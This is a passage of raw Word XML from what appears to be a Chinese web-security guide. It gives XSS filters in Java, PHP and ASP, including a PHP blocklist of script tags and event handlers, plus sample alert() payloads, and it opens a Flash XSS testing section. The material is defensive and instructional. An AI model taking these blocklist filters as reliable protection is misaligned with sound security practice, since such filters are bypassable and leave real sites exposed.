          <w:p w14:paraId="0EE412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大于号</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EA6732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329D1B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lt;':</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50249BA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小于号</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2774BAF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4434CF3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38FE9A7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单引号</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A78C27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25CA078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528FC93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lastRenderedPageBreak/>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双引号</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71282B6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2D1542F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amp;':</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23B6DB0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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38FD07C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5E1F9F7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7E35EAC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斜线</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="757CBDD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4D8CC4F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2C6C1C8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井号</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A90469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1BF18C0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default:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C962C6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b.append(c);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4832644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503DD11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E8BE66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813D9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sb.toString();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C98B27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9047E1E" w14:textId="77777777" w:rsidR="00945D39" w:rsidRPr="00B8545D" w:rsidRDefault="00945D39" w:rsidP="00B8545D">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0C66FF9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667402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获取最原始的</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>request</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="221425C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79F928F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turn</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66A4787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EAF7CF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HttpServletRequest getOrgRequest() {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D5A385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orgRequest;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="492F6FC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BE0759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D0C209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获取最原始的</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>request</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的静态方法</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4549EDB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03117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 @return</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="366C59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75BF529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static HttpServletRequest getOrgRequest(HttpServletRequest req) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47CF46C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req instanceof XssHttpServletRequestWrapper){</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75DA88C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XssHttpServletRequestWrapper)req).getOrgRequest();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BBDD6E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1CEAB7D6" w14:textId="77777777" w:rsidR="00945D39" w:rsidRPr="00B8545D" w:rsidRDefault="00945D39" w:rsidP="00B8545D">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="739B44A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req;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26A50E6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525B87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在</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>web.xml</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中添加</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3322988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lt;filter&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="514251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name&gt;xssFilter&lt;/filter-name&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="782D448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class&gt;filter.XssFilter&lt;/filter-class&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BAAEE3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gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6780D77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mapping&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54D5FDD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name&gt;xssFilter&lt;/filter-name&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="307706C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url-pattern&gt;/*&lt;/url-pattern&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="614AED0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mapping&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35872D83" w14:textId="77777777" w:rsidR="00945D39" w:rsidRPr="00B8545D" w:rsidRDefault="00945D39" w:rsidP="00B8545D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DE9CCB7"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t>对于</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言所编写的网站系统的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过滤器：</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945D39" w:rsidRPr="00B8545D" w14:paraId="6DB88436" w14:textId="77777777" w:rsidTr="001A6FF2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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F3EF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lt;?php  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39FEF2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4AA0CD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w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>去除</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>XSS</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（跨站脚本攻击）的函数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ABC57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par $val </w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>字符串参数，可能包含恶意的脚本代码如</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&lt;script language="javascript"&gt;alert("hello world");&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76757B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return  </w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>处理后的字符串</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="140ED71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coded By Androidyue</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="185DF9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839782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function RemoveXSS($val) {  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FC3ED3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remove all non-printable characters. CR(0a) and LF(0b) and TAB(9) are allowed  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A6FA6B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this prevents some character re-spacing such as &lt;java\0script&gt;  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="485C084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 xml:space="preserve">   // note that you have to handle splits with \n, \r, and \t later since they *are* allowed in some inputs  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DB7974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x00-\x08,\x0b-\x0c,\x0e-\x19])/', '', $val);  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5732DA0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t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54E22B1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straight replacements, the user should never need these since they're normal characters  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="039BB2D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this prevents like &lt;IMG SRC=@avascript:alert('XSS')&gt;  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0729101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abcdefghijklmnopqrstuvwxyz'; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D5B135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ABCDEFGHIJKLMNOPQRSTUVWXYZ';  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A024B1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1234567890!@#$%^&amp;*()'; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0507CB0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_|\'\\'; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1704E0A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r ($i = 0; $i &lt; strlen($search); $i++) { </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="312B2BF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 matches the ;, which is optional </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6042F05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0{0,7} matches any padded zeros, which are optional and go up to 8 chars </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="030AD6E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t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51E3369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 @ search for the hex values </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14B1C3B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amp;#[xX]0{0,8}'.dechex(ord($search[$i])).';?)/i', $search[$i], $val); // with a ; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02AEA00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 @ 0{0,7} matches '0' zero to seven times  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="003CC2E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amp;#0{0,8}'.ord($search[$i]).';?)/', $search[$i], $val); // with a ; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="360E7D9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64F456D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t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CB3B1D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now the only remaining whitespace attacks are \t, \n, and \r </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64BA997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a1 = Array('javascript', 'vbscript', 'expression', 'applet', 'meta', 'xml', 'blink', 'link', 'style', 'script', 'embed', 'object', 'iframe', 'frame', 'frameset', 'ilayer', 'layer', 'bgsound', 'title', 'base'); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="659E369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a2 = Array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavailable', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 'ondeactivate', 'ondrag', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', </w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">'onfilterchange', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onmousewheel', 'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 'onrowenter', 'onrowexit', 'onrowsdelete', 'onrowsinserted', 'onscroll', 'onselect', 'onselectionchange', 'onselectstart', 'onstart', 'onstop', 'onsubmit', 'onunload'); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01A0CF7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a = array_merge($ra1, $ra2); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1144D4B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und = true; // keep replacing as long as the previous round replaced something </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18A03B7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hile ($found == true) { </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5615BC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_before = $val; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AEC62A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r ($i = 0; $i &lt; sizeof($ra); $i++) { </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7991B06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652861E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r ($j = 0; $j &lt; strlen($ra[$i]); $j++) { </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59411E6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if ($j &gt; 0) { </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="323851C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35A6ED0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amp;#[xX]0{0,8}([9ab]);)'; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FE011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3204255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amp;#0{0,8}([9|10|13]);)'; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="641A46B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5F16A8F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035D4CE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ra[$i][$j]; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D5BD15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367BFDB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i';  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DC1CF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eplacement = substr($ra[$i], 0, 2).'&lt;x&gt;'.substr($ra[$i], 2); // add in &lt;&gt; to nerf the tag  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F319AB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pattern, $replacement, $val); // filter out the hex tags  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D0A1D2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if ($val_before == $val) {  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="180D28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no replacements were made, so exit the loop  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BD78D5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und = false;  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2756307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308D908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41EF7D3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1BA27FF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eturn $val;  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="441405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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F1BCA9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w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>测试一下效果</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7836D89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echo RemoveXSS("&lt;script language='javascript'&gt;alert('hello world');&lt;/script&gt;") ;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B210B3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gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5AB50B38"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lastRenderedPageBreak/>
        <w:t>asp</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序网站出现</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跨站脚本攻击（</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）漏洞的时候可以使用</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3"/>
      </w:tblGrid>
      <w:tr w:rsidR="00945D39" w:rsidRPr="00B8545D" w14:paraId="15F97B42" w14:textId="77777777" w:rsidTr="001A6FF2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855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7C4A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源码如下：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>url=trim(request("url"))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31326F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修改如下：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>url=Server.HTMLEncode(trim(request("url")))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76EC6F1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使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Server.HTMLEncode</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>它来解决脚本跨站攻击漏洞</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="676FC82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或者：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="465DB27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对用户输入区域只允许适应应用功能所必需的规定字符输入，</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对于合法的“</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>”、“</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>”“</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="00B8545D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>”这三个符号进行替换：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1394719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place(str,"&lt;","&amp;#x3C;")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40D5CEE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place(str,"&gt;","&amp;#x3E;")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6570084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place(str,"&amp;","&amp;#x26;")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="05E63E96" w14:textId="3DFDFD6C" w:rsidR="00A944EF" w:rsidRPr="00B8545D" w:rsidRDefault="00EF7E10" w:rsidP="00B8545D">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5D364E3" w14:textId="08A60B9F" w:rsidR="00CA6BAF" w:rsidRPr="00F757E4" w:rsidRDefault="00CA6BAF" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="91" w:name="_Toc498434553"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FLASH</w:t>
      </w:r>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跨站脚本攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
    </w:p>
    <w:p w14:paraId="5CEA8081" w14:textId="1B49ED1F"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="002A6B7B" w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="004C56AF" w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Flash</w:t>
      </w:r>
      <w:r w:rsidR="006C4E8E" w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中可以嵌入</w:t>
      </w:r>
      <w:r w:rsidR="006C4E8E" w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ActionScript</w:t>
      </w:r>
      <w:r w:rsidR="006C4E8E" w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="006C4E8E" w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ActionScript</w:t>
      </w:r>
      <w:r w:rsidR="006C4E8E" w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一种非常强大和灵活的脚本，通过构造恶意</w:t>
      </w:r>
      <w:r w:rsidR="00987775" w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="006C4E8E" w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ActionScript</w:t>
      </w:r>
      <w:r w:rsidR="006C4E8E" w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本</w:t>
      </w:r>
      <w:r w:rsidR="004C56AF" w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00987775" w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可</w:t>
      </w:r>
      <w:r w:rsidR="004C56AF" w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取用户的敏感信息或者</w:t>
      </w:r>
      <w:r w:rsidR="00961323" w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>诱骗用户</w:t>
      </w:r>
      <w:r w:rsidR="004C56AF" w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开具有网页木马的</w:t>
      </w:r>
      <w:r w:rsidR="004C56AF" w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="0050538C" w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面</w:t>
      </w:r>
      <w:r w:rsidR="004C56AF" w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B50C867" w14:textId="77777777"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测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B0CD52" w14:textId="74D2BF5C" w:rsidR="00F81003" w:rsidRPr="00D0216A" w:rsidRDefault="00F81003" w:rsidP="00D0216A">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造含有</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xss</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flash</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0216A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，如一个常见的</w:t>
      </w:r>
